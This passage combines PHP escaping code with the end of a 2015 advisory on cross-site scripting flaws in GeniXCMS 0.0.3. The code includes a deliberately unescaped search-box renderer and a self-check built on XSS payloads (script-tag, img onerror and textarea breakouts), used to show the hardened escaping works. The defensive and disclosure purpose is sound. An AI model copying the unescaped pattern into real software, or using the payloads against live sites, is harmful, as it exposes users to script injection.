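function esc_html_text(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Inline <script> context: JSON-encode and hex-escape < > & ' " so a stored
// value can never terminate the script block or a string literal.
function esc_js_value($v): string {
    return json_encode(
        $v,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Vulnerable rendering of the search box: q is reflected verbatim.
function render_search_vulnerable(string $q): string {
    return "<input type='text' name='q' value='" . $q . "'>";
}

// Hardened rendering: identical markup, value escaped for attribute context.
function render_search_hardened(string $q): string {
    return "<input type='text' name='q' value='" . esc_html_text($q) . "'>";
}

// Post rendering: title as element text, content inside the editor's
// <textarea>, and both again as a JSON blob for front-end script.
function render_post_hardened(string $title, string $content): string {
    return '<h1>' . esc_html_text($title) . '</h1>'
        . '<textarea name="content">' . esc_html_text($content) . '</textarea>'
        . '<script>var post = '
        . esc_js_value(['title' => $title, 'content' => $content])
        . ';</script>';
}

// Self-check with constructed inputs modelled on the advisory's payloads.
function self_check(): bool {
    $q    = "1'<script>alert('XSS By Hyp3rlinx')</script>";
    $vuln = render_search_vulnerable($q);
    $safe = render_search_hardened($q);
    $post = render_post_hardened(
        "<img src=x onerror=alert(1)>",
        "</textarea><script>alert(1)</script>"
    );
    return strpos($vuln, '<script>') !== false        // breakout visible when unescaped
        && strpos($safe, '<script>') === false         // no raw tag survives escaping
        && strpos($safe, "value=''") === false         // the leading ' did not close the attribute
        && substr_count($post, '</textarea>') === 1    // only the real closing tag remains
        && substr_count($post, '</script>') === 1;     // JSON_HEX_TAG neutralised the embedded one
}

if (PHP_SAPI === 'cli') {
    echo self_check() ? "escaping checks passed\n" : "escaping checks FAILED\n";
}
```

The same three contexts appear in the slider output earlier on this page (attribute values, the description text node and the data_2 script array), which is why a single escaping function is never enough: each sink needs the encoder for its own context, applied at the point of output.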



Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 21, 2015 : Public Disclosure



Severity Level:
=========================================================
Med



Description:
=========================================================

Request Method(s):         [+] GET & POST 


Vulnerable Product:        [+] GeniXCMS 0.0.3 


Vulnerable Parameter(s):   [+] q, content & title
                       

Affected Area(s):          [+] index.php
                                                       

===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and that due credit is given. Permission is
explicitly given for insertion in vulnerability databases and similar, provided that
due credit is given to the author. The author is not responsible for any misuse of the
information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.


(hyp3rlinx)